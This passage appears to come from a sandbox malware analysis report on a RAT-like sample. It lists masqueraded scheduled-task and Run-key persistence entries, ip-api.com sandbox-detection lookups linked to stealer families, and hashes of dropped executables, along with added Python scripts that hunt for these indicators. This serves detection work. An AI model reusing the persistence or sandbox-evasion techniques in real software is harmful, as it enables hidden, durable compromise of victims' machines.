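    r'07:42:26 Task Scheduler Run new task: ApplicationFrameHost path: "C:\Users\Default User\ApplicationFrameHost.exe"',
    r'07:42:26 Task Scheduler Run new task: ApplicationFrameHostA path: "C:\Users\Default User\ApplicationFrameHost.exe"',
    r'07:42:26 Task Scheduler Run new task: dwm path: "C:\Windows\AppReadiness\dwm.exe"',
    r'07:42:26 Task Scheduler Run new task: dwmd path: "C:\Windows\AppReadiness\dwm.exe"',
    r'07:42:26 Task Scheduler Run new task: RuntimeBroker path: "C:\blockweb\RuntimeBroker.exe"',
    r'07:42:26 Task Scheduler Run new task: RuntimeBrokerR path: "C:\blockweb\RuntimeBroker.exe"',
    r'07:42:26 Task Scheduler Run new task: ukzoUeHPfeDwGdTDRNL path: "C:\blockweb\ukzoUeHPfeDwGdTDRNL.exe"',
    r'07:42:26 Task Scheduler Run new task: ukzoUeHPfeDwGdTDRNLu path: "C:\blockweb\ukzoUeHPfeDwGdTDRNL.exe"',
    r'07:42:26 Autostart Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ukzoUeHPfeDwGdTDRNL "C:\Recovery\ukzoUeHPfeDwGdTDRNL.exe"',
    r'07:42:28 Task Scheduler Run new task: SgrmBroker path: "C:\Windows\INF\.NET Data Provider for Oracle\SgrmBroker.exe"',
    r'07:42:28 Task Scheduler Run new task: SgrmBrokerS path: "C:\Windows\INF\.NET Data Provider for Oracle\SgrmBroker.exe"',
    r'07:42:28 Task Scheduler Run new task: WmiPrvSE path: "C:\blockweb\WmiPrvSE.exe"',
    r'07:42:28 Task Scheduler Run new task: WmiPrvSEW path: "C:\blockweb\WmiPrvSE.exe"',
    r'07:42:35 Autostart Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run dwm "C:\Windows\AppReadiness\dwm.exe"',
    r'07:42:43 Autostart Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ApplicationFrameHost "C:\Users\Default User\ApplicationFrameHost.exe"',
    r'07:42:51 Autostart Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\blockweb\RuntimeBroker.exe"',
    r'07:42:59 Autostart Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run WmiPrvSE "C:\blockweb\WmiPrvSE.exe"',
    r'07:43:07 Autostart Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SgrmBroker "C:\Windows\INF\.NET Data Provider for Oracle\SgrmBroker.exe"',
    r'07:43:15 Autostart Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ukzoUeHPfeDwGdTDRNL "C:\Users\user\ukzoUeHPfeDwGdTDRNL.exe"',
    r'07:43:23 Autostart Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run dwm "C:\Windows\AppReadiness\dwm.exe"',
    r'07:43:31 Autostart Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ApplicationFrameHost "C:\Users\Default User\ApplicationFrameHost.exe"',
    r'07:43:40 Autostart Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\blockweb\RuntimeBroker.exe"',
    r'07:43:48 Autostart Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run WmiPrvSE "C:\blockweb\WmiPrvSE.exe"',
    r'07:43:56 Autostart Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SgrmBroker "C:\Windows\INF\.NET Data Provider for Oracle\SgrmBroker.exe"',
    r'07:44:04 Autostart Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run ukzoUeHPfeDwGdTDRNL "C:\Users\user\ukzoUeHPfeDwGdTDRNL.exe"',
    r'07:44:12 Autostart Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run dwm "C:\Windows\AppReadiness\dwm.exe"',
]

# Assumption: directories where the genuine Windows binaries of these names live.
SYSTEM_BINARY_DIRS = {
    "dwm.exe": {r"c:\windows\system32"},
    "runtimebroker.exe": {r"c:\windows\system32"},
    "applicationframehost.exe": {r"c:\windows\system32"},
    "sgrmbroker.exe": {r"c:\windows\system32"},
    "wmiprvse.exe": {r"c:\windows\system32\wbem", r"c:\windows\syswow64\wbem"},
}

TASK_RE = re.compile(r'Run new task: (\S+) path: "([^"]+)"')
RUN_RE = re.compile(r'Run: (\S+\\Run) (\S+) "([^"]+)"')


@dataclass(frozen=True)
class Autostart:
    source: str  # "Task Scheduler" or the Run key path
    name: str    # task name or Run value name
    path: str    # image path the entry launches


def parse_timeline(lines):
    """Turn Task Scheduler / Autostart rows into Autostart records; other rows are skipped."""
    entries = []
    for line in lines:
        if m := TASK_RE.search(line):
            entries.append(Autostart("Task Scheduler", m.group(1), m.group(2)))
        elif m := RUN_RE.search(line):
            entries.append(Autostart(m.group(1), m.group(2), m.group(3)))
    return entries


def is_masqueraded(path):
    """True when the file name is a known system binary but its directory is not the genuine one."""
    expected = SYSTEM_BINARY_DIRS.get(ntpath.basename(path).lower())
    return expected is not None and ntpath.dirname(path).lower() not in expected


def paired_task_names(entries):
    """Tasks registered twice, the twin name being the original plus its own first character."""
    names = {e.name for e in entries if e.source == "Task Scheduler"}
    return sorted((n, n + n[0]) for n in names if n + n[0] in names)


def triage(lines):
    """Summarise the rows: entry count, distinct masqueraded image paths, duplicated task pairs."""
    entries = parse_timeline(lines)
    return {
        "entries": len(entries),
        "masqueraded_paths": sorted({e.path for e in entries if is_masqueraded(e.path)}),
        "task_pairs": paired_task_names(entries),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_TIMELINE).items():
        print(key, value)
```

On this input the triage returns 26 entries, five masqueraded image paths (the ukzoUeHPfeDwGdTDRNL.exe drops are not system names and are left to the user-root check) and six duplicated task pairs. Against a live host the same two functions can be fed the output of schtasks and the Run keys instead of report rows.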
Match: 208.95.112.1
Associated Sample Name / URL | Detection | Threat Name | Context
file.exe | malicious | WhiteSnake Stealer | ip-api.com/line?fields=query,country
Comprobante de pago.xlam.xlsx | malicious | AgentTesla | ip-api.com/line/?fields=hosting
O3o5Xzk5Wd.exe | malicious | AsyncRAT, XWorm | ip-api.com/line/?fields=hosting
bLaLoo4ET5.exe | malicious | Quasar | ip-api.com/json/
sipari_.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
Transferencia.doc | malicious | Quasar | ip-api.com/json/
SecuriteInfo.com.FileRepMalware.22561.28030.exe | malicious | Python Stealer, Exela Stealer | ip-api.com/json
file.exe | malicious | LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, XWorm | ip-api.com/line/?fields=hosting
SecuriteInfo.com.Win64.Malware-gen.13500.20938.exe | malicious | Python Stealer, Exela Stealer | ip-api.com/json
SecuriteInfo.com.Python.Muldrop.16.26792.13248.exe | malicious | Blank Grabber | ip-api.com/line/?fields=hosting
Match: ip-api.com
Associated Sample Name / URL | Detection | Threat Name | Context
file.exe | malicious | WhiteSnake Stealer | 208.95.112.1
Comprobante de pago.xlam.xlsx | malicious | AgentTesla | 208.95.112.1
O3o5Xzk5Wd.exe | malicious | AsyncRAT, XWorm | 208.95.112.1
bLaLoo4ET5.exe | malicious | Quasar | 208.95.112.1
sipari_.exe | malicious | AgentTesla | 208.95.112.1
Transferencia.doc | malicious | Quasar | 208.95.112.1
https://link.edgepilot.com/s/b064b0de/7_W48d8I8kGlXhrfD-hDUg?u=https://delivmodas.ks.infinitoag.com/ | malicious | Unknown | 51.195.5.58
SecuriteInfo.com.FileRepMalware.22561.28030.exe | malicious | Python Stealer, Exela Stealer | 208.95.112.1
file.exe | malicious | LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, XWorm | 208.95.112.1
SecuriteInfo.com.Win64.Malware-gen.13500.20938.exe | malicious | Python Stealer, Exela Stealer | 208.95.112.1
Match: TUT-ASUS
Associated Sample Name / URL | Detection | Threat Name | Context
file.exe | malicious | WhiteSnake Stealer | 208.95.112.1
Comprobante de pago.xlam.xlsx | malicious | AgentTesla | 208.95.112.1
O3o5Xzk5Wd.exe | malicious | AsyncRAT, XWorm | 208.95.112.1
bLaLoo4ET5.exe | malicious | Quasar | 208.95.112.1
sipari_.exe | malicious | AgentTesla | 208.95.112.1
Transferencia.doc | malicious | Quasar | 208.95.112.1
SecuriteInfo.com.FileRepMalware.22561.28030.exe | malicious | Python Stealer, Exela Stealer | 208.95.112.1
file.exe | malicious | LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, XWorm | 208.95.112.1
SecuriteInfo.com.Win64.Malware-gen.13500.20938.exe | malicious | Python Stealer, Exela Stealer | 208.95.112.1
SecuriteInfo.com.Python.Muldrop.16.26792.13248.exe | malicious | Blank Grabber | 208.95.112.1
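The three context tables above show the same behaviour across unrelated families (WhiteSnake, AgentTesla, AsyncRAT, Quasar, Exela, Blank Grabber): a lookup against ip-api.com, most often the path /line/?fields=hosting, which returns nothing but whether the caller's address sits in a hosting or datacenter range, a cheap way to tell a sandbox from a victim desktop. The Python below is an added example, not part of the report, that pulls such lookups out of a web-proxy log and separates the hosting-only probe from the fuller geolocation queries (fields=query,country or the bare /json endpoint) also seen in the tables. The proxy log format and its lines are constructed for the example.

```python
"""Hunt for ip-api.com lookups in a web-proxy log.

Added example, not part of the Joe Sandbox report. The log format
("<timestamp> <client-ip> <method> <url> <status>") and the sample lines
are constructed for the example.
"""
from urllib.parse import parse_qs, urlsplit

# Constructed proxy log: two hosts perform ip-api.com lookups, one also browses normally.
SAMPLE_PROXY_LOG = """\
2024-10-30T07:42:20Z 10.0.0.15 GET http://ip-api.com/line/?fields=hosting 200
2024-10-30T07:42:21Z 10.0.0.15 GET http://ip-api.com/line?fields=query,country 200
2024-10-30T07:42:30Z 10.0.0.23 GET http://ip-api.com/json/ 200
2024-10-30T07:43:01Z 10.0.0.23 GET https://www.microsoft.com/en-us/ 200
2024-10-30T07:43:05Z 10.0.0.40 GET http://ip-api.com/json 200
"""


def classify_ipapi(url):
    """Return (endpoint, requested fields) for an ip-api.com URL, or None for any other host."""
    parts = urlsplit(url)
    if parts.hostname != "ip-api.com":
        return None
    # "/line/", "/line" and "/json/" all normalise to the first path component.
    endpoint = parts.path.strip("/").split("/")[0] or "json"
    raw_fields = parse_qs(parts.query).get("fields", [""])[0]
    fields = tuple(f for f in raw_fields.split(",") if f)
    return endpoint, fields


def hunt(log_text):
    """Group ip-api.com lookups per client; mark the ones that ask only for 'hosting'."""
    hits = {}
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, client, _method, url, _status = line.split()
        classified = classify_ipapi(url)
        if classified is None:
            continue
        endpoint, fields = classified
        hits.setdefault(client, []).append({
            "time": ts,
            "endpoint": endpoint,
            "fields": fields,
            "hosting_check": fields == ("hosting",),
        })
    return hits


if __name__ == "__main__":
    for client, lookups in hunt(SAMPLE_PROXY_LOG).items():
        print(client, lookups)
```

A single hosting-only lookup from a workstation is a strong lead on its own, since ordinary software has no reason to ask that question; the fuller queries are weaker but still worth joining with the process that made the connection.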
                                      No context
                                      No context
                                      Process:C:\blockweb\portrefNet.exe
                                      File Type:ASCII text, with very long lines (412), with no line terminators
                                      Category:dropped
                                      Size (bytes):412
                                      Entropy (8bit):5.832466179580188
                                      Encrypted:false
                                      SSDEEP:12:EUVg2MxIMMqFKdteCI/Kb13L5LAjMjszj3Z:EL2MxIZqFKd0d/KB3LVAjiSJ
                                      MD5:D5FA5EE4E200FE2867574F4AF31A973F
                                      SHA1:A0133F94DDF4E6DE36186063E6D7EBD3F292F246
                                      SHA-256:924C1A9BC933DA0E39F7DD90D74C43764EC4AC991500808F6F4428254EF2BB11
                                      SHA-512:07BCBE94A76BF0F711EACBC11398ABAB7AAFEF6E75F1F8C3422E2C79B6D6A41E397032938245E4FFFD20714FE253434402E1969572734226D46583EA2DCC1874
                                      Malicious:false
                                      Preview:qxI49HI51opdoAP0qZwk9iAsmI7bKN7cNDNKT7iDmCw9ymBbnOv5gjZHxaR1JqunqNQkxFgt1t77wA3AGgy5bC5noFW3pr36RISlWaoisCDwlcVwhRun1zMoRm6ssnDKzBporRop2PMZ8ICLtkVY6QEc6oTte6zF837kwrEPmEulmxqIku8IRpNj6NsD84L6aHaELbZCfGv1fc0J8LJu7rySpYni9BRs3yLeWl6JU5nL3VDdXiFwva8tTHYxx1DeyD8rRVwWOAZCEnYUUKKa5e7c0cLOMJVd1IW0XVMCwtivB5pqsEcnqniUFf0yJiJFo5K5Qi687InM6Mb4xffIqsxNkCv2fX3NjcGFuuZKIdpi9WX3D6BnDBZ6I7VOxEdkPamdFWJCGUAMCPONo1yjVPKiDK6x
                                      Process:C:\blockweb\portrefNet.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):2300928
                                      Entropy (8bit):7.579577025941164
                                      Encrypted:false
                                      SSDEEP:49152:ExAAnyf8vPgcj+Sx5j2KKcnhhhMssVDp:ExAWsGPgcjXKcnhhTs
                                      MD5:84C6CB042DC58A109DFA2DB8381BEC28
                                      SHA1:4A86E72E9D2C3E0C17CD3A09DF754169F4B7CE31
                                      SHA-256:2E09ED806F9A7C57186872AB3715909437E2729500BC194E0A2CF3405C4CD5F0
                                      SHA-512:C8EF31A3EAEAC8EF0FAA043D0BDD085063D54572D0A7EEFADE08A9DB5F97C397BB3270BACA71817DA9D91C0D1227FCEE9CE019065BB5A66F20FED9D7349AB0EF
                                      Malicious:true
                                      Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 88%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................."..6........#.. ... #...@.. ........................#...........@.................................`.#.K....`#.......................#...................................................... ............... ..H............text.....".. ...."................. ..`.sdata.../... #..0....".............@....rsrc........`#.......#.............@..@.reloc........#.......#.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\blockweb\portrefNet.exe
                                      File Type:ASCII text, with very long lines (440), with no line terminators
                                      Category:dropped
                                      Size (bytes):440
                                      Entropy (8bit):5.844783463771706
                                      Encrypted:false
                                      SSDEEP:12:srPRp/5qBjRcNxlDfwDnWqCDZg8QlGMkAAzF:srOeNxlDoWq6+OKAh
                                      MD5:4DC40A65996661CACC3E71AB2BA0F62A
                                      SHA1:13F5AE0D4887BF15E8ECE4FBAB59BF25A1E32DCE
                                      SHA-256:0FD8C19A2048E80DCAC3CFBB21F38578AF2E43080673523F1F0C374B290F6A76
                                      SHA-512:74BB69C0EA4DC7470195A9B44685284A42E2E85916598777534E5A954087A00D7AECACC2A146F603B687A22B82FE2AB1F4A1AB0B078C498D5E654532689F372A
                                      Malicious:false
                                      Preview:2aaF607xcIxlzloUZpQZYRlJaFHKMf2MUfSc7YbXyEaUyZpnE2iWbiClzQp0swk7PkRUTMWAO2lT0QVAadGT6gvwdqnrskoBecFOIUU2giHj6sui5oaPqQBtye0mjpRoOjzXLG2FINxYYMzv5EvDKZUNbVZnesT0QdUW3WXywUGcdmUmoFqf4OdzOl5zrOla46I51d2iq7RzS2uyBw9YBy6C9fIRbhGhtphgeYvLNIy66ngW1Gy5PMZGAF6VVkHJ0uGmUNTmAxL399FV8vaUsLRgQafYcZ0mApGMh3CnwM4bBfHBAlWjKxaockW3r5Kl7i3U23yFtwhgR0euTeY1CQcMOct6hI51CTedmwIGwR0YQ4WmGljMgSiqGqGaK1hk0pd8VBHhWSEvaD6UFH06itVtvxX6qs65uPhlaYQFdC0NOxQCtvUCBlCH
                                      Process:C:\blockweb\portrefNet.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):2300928
                                      Entropy (8bit):7.579577025941164
                                      Encrypted:false
                                      SSDEEP:49152:ExAAnyf8vPgcj+Sx5j2KKcnhhhMssVDp:ExAWsGPgcjXKcnhhTs
                                      MD5:84C6CB042DC58A109DFA2DB8381BEC28
                                      SHA1:4A86E72E9D2C3E0C17CD3A09DF754169F4B7CE31
                                      SHA-256:2E09ED806F9A7C57186872AB3715909437E2729500BC194E0A2CF3405C4CD5F0
                                      SHA-512:C8EF31A3EAEAC8EF0FAA043D0BDD085063D54572D0A7EEFADE08A9DB5F97C397BB3270BACA71817DA9D91C0D1227FCEE9CE019065BB5A66F20FED9D7349AB0EF
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 88%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................."..6........#.. ... #...@.. ........................#...........@.................................`.#.K....`#.......................#...................................................... ............... ..H............text.....".. ...."................. ..`.sdata.../... #..0....".............@....rsrc........`#.......#.............@..@.reloc........#.......#.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\blockweb\portrefNet.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):225
                                      Entropy (8bit):5.679728406242851
                                      Encrypted:false
                                      SSDEEP:6:ydzcvya3fj4LSp8z5L30HN+R9JtkuAQiZLuAo:ydzcqa3fj4ei5IWKkiZC
                                      MD5:01EC8BED1BD7379BF04D53D986266F7E
                                      SHA1:8BE8870081FBA2CDC4DF105A42DCF73BC9E5E168
                                      SHA-256:D43631B96DB20F07FA362480054F2BC4CC12BD13BBA523AF097C7BE50C09069D
                                      SHA-512:9EE7D5BE09BC7D83C5FD3D8BFB52125494A8B4A67589A319902549AA931273BA5238EB43554A0F2DC90ED0E109413E3DD7209A52E17639C191707072114CA02D
                                      Malicious:false
                                      Preview:7wUyQB6LmIejD3PAFwoi7Xbpga79b8LDkgA6Kj9AC8zT2UCyNbEEJIQjVpRzE6tn6a8g3Szgwng8iHwLYIwA3H3bQblfRK6FPLWbVf54liRgmRAN2Fb5KttyghPcrUOmrbtWuV02N1YUzXz8aXmLtA5fbi4yQcNRUpyLinchPisSVZ8JrQBTrC3rgN5MaBmuoGAKjoaw5E6KSmJCjvG9b3jRwHpUsPHO6
                                      Process:C:\blockweb\portrefNet.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):2300928
                                      Entropy (8bit):7.579577025941164
                                      Encrypted:false
                                      SSDEEP:49152:ExAAnyf8vPgcj+Sx5j2KKcnhhhMssVDp:ExAWsGPgcjXKcnhhTs
                                      MD5:84C6CB042DC58A109DFA2DB8381BEC28
                                      SHA1:4A86E72E9D2C3E0C17CD3A09DF754169F4B7CE31
                                      SHA-256:2E09ED806F9A7C57186872AB3715909437E2729500BC194E0A2CF3405C4CD5F0
                                      SHA-512:C8EF31A3EAEAC8EF0FAA043D0BDD085063D54572D0A7EEFADE08A9DB5F97C397BB3270BACA71817DA9D91C0D1227FCEE9CE019065BB5A66F20FED9D7349AB0EF
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 88%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................."..6........#.. ... #...@.. ........................#...........@.................................`.#.K....`#.......................#...................................................... ............... ..H............text.....".. ...."................. ..`.sdata.../... #..0....".............@....rsrc........`#.......#.............@..@.reloc........#.......#.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\blockweb\portrefNet.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):254
                                      Entropy (8bit):5.768259579575574
                                      Encrypted:false
                                      SSDEEP:6:1zWUyWLVQxQWzeWWo3T3Uit+tY9RBbsux09Is09olw5aBwBXT2FwyR:1zWUz+eWWo3T3dtDDlsux09AwwnXT0HR
                                      MD5:1E73BA0F0F1B3F2CCFBADAE8CC5AA592
                                      SHA1:9E847BCBAAC40FAB0566A8DAB54B40D3E08DAA4F
                                      SHA-256:B1A73E78010FD26B4736E53125723DB02ECAE7B6BFA8A2302302BA72519D051D
                                      SHA-512:EF6B460AD43D7C43913A960038FAE3F4A9FC53AEF70DA911751521F482A0C91C78C21610B816612FCAB6950343F878E02BCC21DC38610C5309FB9EC44F5C4D18
                                      Malicious:false
                                      Preview:c1t39ZWrEPlL3jamaXUb71gALBfLpUgvma9pWd3KLp5VJ2M5IJEmHOSkUss83KBuszjcjuQ7eJQR6L0TykDfP4oXIZUnv5RAnKmUSuVX3GI77AoJ1YKTGgeyLLTKanMi2PnvigADOqmIwqaIvKvWv74HqyJHaL6Q4jFrW2lVYGFZ3VCeuLYP10x4VfFtX2mCtWOMlsv2jZ7o2eOUwoWPwrYEvKV1x17fdCqgHz2Cagpb2JC1Ru7sfXQC8KbbW4
                                      Process:C:\blockweb\portrefNet.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):2300928
                                      Entropy (8bit):7.579577025941164
                                      Encrypted:false
                                      SSDEEP:49152:ExAAnyf8vPgcj+Sx5j2KKcnhhhMssVDp:ExAWsGPgcjXKcnhhTs
                                      MD5:84C6CB042DC58A109DFA2DB8381BEC28
                                      SHA1:4A86E72E9D2C3E0C17CD3A09DF754169F4B7CE31
                                      SHA-256:2E09ED806F9A7C57186872AB3715909437E2729500BC194E0A2CF3405C4CD5F0
                                      SHA-512:C8EF31A3EAEAC8EF0FAA043D0BDD085063D54572D0A7EEFADE08A9DB5F97C397BB3270BACA71817DA9D91C0D1227FCEE9CE019065BB5A66F20FED9D7349AB0EF
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 88%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................."..6........#.. ... #...@.. ........................#...........@.................................`.#.K....`#.......................#...................................................... ............... ..H............text.....".. ...."................. ..`.sdata.../... #..0....".............@....rsrc........`#.......#.............@..@.reloc........#.......#.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\blockweb\portrefNet.exe
                                      File Type:ASCII text, with very long lines (657), with no line terminators
                                      Category:dropped
                                      Size (bytes):657
                                      Entropy (8bit):5.884944834589869
                                      Encrypted:false
                                      SSDEEP:12:s+DogolqMBvA7dS49OQroMF32vZDIIEMBhOa3pra7ZsBw9pq:/Dogol7QVc632vt5xa7ZNbq
                                      MD5:C19C638EC7DCCE0A9D24111B58C4CAFA
                                      SHA1:6B68304AB04EF1183E2E3CAC44039761B8224036
                                      SHA-256:DBE4D6B24B42D47E87F5E72E7E243C7A97939CE66EC48CDAE9B49C1EB0C13CDF
                                      SHA-512:1CA53F9531FB91C01F3DCD9E6B4994E3A32144A3CFB44E86764DFD83EEBB05C20F1DDBAA38A5D54AEBCC012291EB59A685AA698DDFE543E52895A3CFE4486BA2
                                      Malicious:false
                                      Process:C:\blockweb\portrefNet.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):2300928
                                      Entropy (8bit):7.579577025941164
                                      Encrypted:false
                                      SSDEEP:49152:ExAAnyf8vPgcj+Sx5j2KKcnhhhMssVDp:ExAWsGPgcjXKcnhhTs
                                      MD5:84C6CB042DC58A109DFA2DB8381BEC28
                                      SHA1:4A86E72E9D2C3E0C17CD3A09DF754169F4B7CE31
                                      SHA-256:2E09ED806F9A7C57186872AB3715909437E2729500BC194E0A2CF3405C4CD5F0
                                      SHA-512:C8EF31A3EAEAC8EF0FAA043D0BDD085063D54572D0A7EEFADE08A9DB5F97C397BB3270BACA71817DA9D91C0D1227FCEE9CE019065BB5A66F20FED9D7349AB0EF
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 88%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................."..6........#.. ... #...@.. ........................#...........@.................................`.#.K....`#.......................#...................................................... ............... ..H............text.....".. ...."................. ..`.sdata.../... #..0....".............@....rsrc........`#.......#.............@..@.reloc........#.......#.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\blockweb\portrefNet.exe
                                      File Type:ASCII text, with very long lines (570), with no line terminators
                                      Category:dropped
                                      Size (bytes):570
                                      Entropy (8bit):5.855260214799926
                                      Encrypted:false
                                      SSDEEP:12:OmYP39YFR6u0JhgQ0yqkvqNQ0vtQrSVGpMyhAg0RRj17:Oi30fg0kDvxVyMybep
                                      MD5:4F8A7449BC9A150E020141BC838CFDC0
                                      SHA1:62E443B7D2639584F1CC54D9DA208EDC2BBDC7FF
                                      SHA-256:D70E7FED1F3EE954A71DAA63795C8EA4D85EABBBA954FE8564AF8F2CB609C33A
                                      SHA-512:55DF1CDE709C924938DCD66C15E13D08670BA2160E6675B9D83835EE6234E570B19A0FC9FE52597BD0CA77BC0F78C65CD03736E653F69A66A806A59E6F87B49F
                                      Malicious:false
                                      Process:C:\blockweb\portrefNet.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):2300928
                                      Entropy (8bit):7.579577025941164
                                      Encrypted:false
                                      SSDEEP:49152:ExAAnyf8vPgcj+Sx5j2KKcnhhhMssVDp:ExAWsGPgcjXKcnhhTs
                                      MD5:84C6CB042DC58A109DFA2DB8381BEC28
                                      SHA1:4A86E72E9D2C3E0C17CD3A09DF754169F4B7CE31
                                      SHA-256:2E09ED806F9A7C57186872AB3715909437E2729500BC194E0A2CF3405C4CD5F0
                                      SHA-512:C8EF31A3EAEAC8EF0FAA043D0BDD085063D54572D0A7EEFADE08A9DB5F97C397BB3270BACA71817DA9D91C0D1227FCEE9CE019065BB5A66F20FED9D7349AB0EF
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 88%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................."..6........#.. ... #...@.. ........................#...........@.................................`.#.K....`#.......................#...................................................... ............... ..H............text.....".. ...."................. ..`.sdata.../... #..0....".............@....rsrc........`#.......#.............@..@.reloc........#.......#.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\blockweb\portrefNet.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):185
                                      Entropy (8bit):5.572549083446099
                                      Encrypted:false
                                      SSDEEP:3:9EDLBRPosgpMPdRQC908/0cW6N4VsHgcdqC7snkjUId4BndQbJman7prAUR/WCyz:2DMTiFCCuCDW6NCsHgcgUsnqiCTBAURw
                                      MD5:E4ADAA6794F118425108580EF43B7470
                                      SHA1:C4E6176BB81A302D346DEF4143F3D3ACC4C2ECDE
                                      SHA-256:A3B242AB483B0EFFCE00DEF1D4042818B6F97D9D99325F0EB9F1E621E255AC3D
                                      SHA-512:CFA61AD6C43D8080A47853102EC37EA7236A6EB57D113A15711416A8558BD280D90EC832B1886D7646760E77FE582BFA36B0926664CF813A70A7ABFF709FEBF2
                                      Malicious:false
                                      Preview:BbdNDgArMQ1fQdNXQRvdRzOD72jMIODT1bN4bTqQuNbej6t4XqRgXK3MMZQL7yi8NhozQT57lftEXueBIoyc7g5qhBrCCeS5ocQBR4oEvT52azyb4ODTAFBqm8ROm24GMyZ5dctO9urnlCPsNPHyb95ibkYTmac2ZyqmZ37beyTQYXFjsjBWuGpM2
                                      Process:C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe
                                      File Type:CSV text
                                      Category:dropped
                                      Size (bytes):1492
                                      Entropy (8bit):5.3787668257697945
                                      Encrypted:false
                                      SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhwE4ksKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6owHptHTHf
                                      MD5:761D1106534DF52590D691CAD8962C57
                                      SHA1:D3678D8F8635FF85D354F7EE2FFC24008357DC5B
                                      SHA-256:73784F8EEA9F790E13C7DA5137D0735B161D974DE8F748ABFD4A3951CE91FAB2
                                      SHA-512:AA3595F2936C95C599C6E8C2784CA18FDC7DE34F290D38B56FCC52D82CDCBF002EAE0BB16DD6355DC8AD85F6DCC69246FD3D07274A49C9914F4769F256BA16ED
                                      Malicious:false
                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System
                                      Process:C:\blockweb\portrefNet.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):1830
                                      Entropy (8bit):5.3661116947161815
                                      Encrypted:false
                                      SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkrJHpHNpaHKlT4x:iq+wmj0qCYqGSI6oPtzHeqKktJtpaqZ8
